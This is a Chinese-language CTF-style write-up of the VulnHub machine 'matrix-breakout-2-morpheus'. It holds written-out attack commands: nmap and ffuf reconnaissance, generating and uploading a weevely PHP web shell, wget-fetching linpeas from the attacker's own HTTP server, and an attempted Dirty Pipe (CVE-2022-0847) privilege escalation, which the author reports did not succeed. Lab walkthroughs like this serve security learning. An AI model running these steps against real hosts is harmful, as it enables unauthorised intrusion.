vulnhub靶场1:matrix-breakout-2-morpheus

一、启动靶场后,kali nmap局域网扫描发现目标主机

nmap -sn 192.168.65.0/24

-sn:Ping扫描-禁用端口扫描,用于主机发现

二、扫描到主机以后,继续用nmap扫描,发现开放80端口。

$ nmap 192.168.65.129     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-22 09:09 EST
Nmap scan report for 192.168.65.129
Host is up (0.0025s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
81/tcp open  hosts2-ns

三、访问80端口,发现网站

vulnhub靶场1:matrix-breakout-2-morpheus_第1张图片

四、使用ffuf扫描文件

ffuf -u http://192.168.65.129/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ic -e  .asp,.php,.html,.txt

几个参数的含义:-c 彩色输出、 -ic 忽略字典注释 、 -e指代扫描文件后缀

vulnhub靶场1:matrix-breakout-2-morpheus_第2张图片

扫描到了graffiti.php文件,浏览器打开,发现是一个上传页面。

vulnhub靶场1:matrix-breakout-2-morpheus_第3张图片

五,通过burp抓包发现,提交数据写入了一个文件。通过这种方式可以上传木马文件。

vulnhub靶场1:matrix-breakout-2-morpheus_第4张图片

六、使用kali weevely生成一个木马文件

weevely generate cmd ./a.php

将文件内容url编码后,上传服务器。然后就可以通过weevely连接了。

vulnhub靶场1:matrix-breakout-2-morpheus_第5张图片

七、通过weevely连接上传的木马

weevely http://192.168.65.129/b.php cmd

连接上去以后,通过weevely上传漏洞扫描脚:linpeas。

kali开启服务器监听,服务器通过wget获取文件。

python3 -m http.server 8080
wegt http://192.168.65.130:8080/linpeas.sh

当然也可以通过weevely的文件上传功能,直接从kali上传文件,被上传文件要写绝对目录。

file_upload /home/kali/Desktop/web/linpeas.sh linpeas2.sh

八、上传完成后直接运行该脚本:

分析完成后发现存在dirty-pipe漏洞:

vulnhub靶场1:matrix-breakout-2-morpheus_第6张图片

这里使用: CVE-2022-0847进行提权

首先下载:命令:git clone https://github.com/imfiver/CVE-2022-0847.git

使用同样方法上传提权文件后执行:

bash Dirty-Pipe.sh

按照网上其他的教程,应该这步可以提权成功,但是我这个尝试了好几次都没有成功,不知道为啥。

vulnhub靶场1:matrix-breakout-2-morpheus_第7张图片

基本上告一段落,研究了一下,还是没发现为啥没有提权成功,等后面有时间在分析一下原因。


主要工具:

nmap

ffuf

weevely (kali上的菜刀,正好用)

linpeas.sh 提权扫描脚本

CVE-2022-0847 Dirty-Pipe漏洞(存在于Linux内核5.8及之后版本中的本地提权漏洞

你可能感兴趣的:(vulnhub,网络安全,web安全)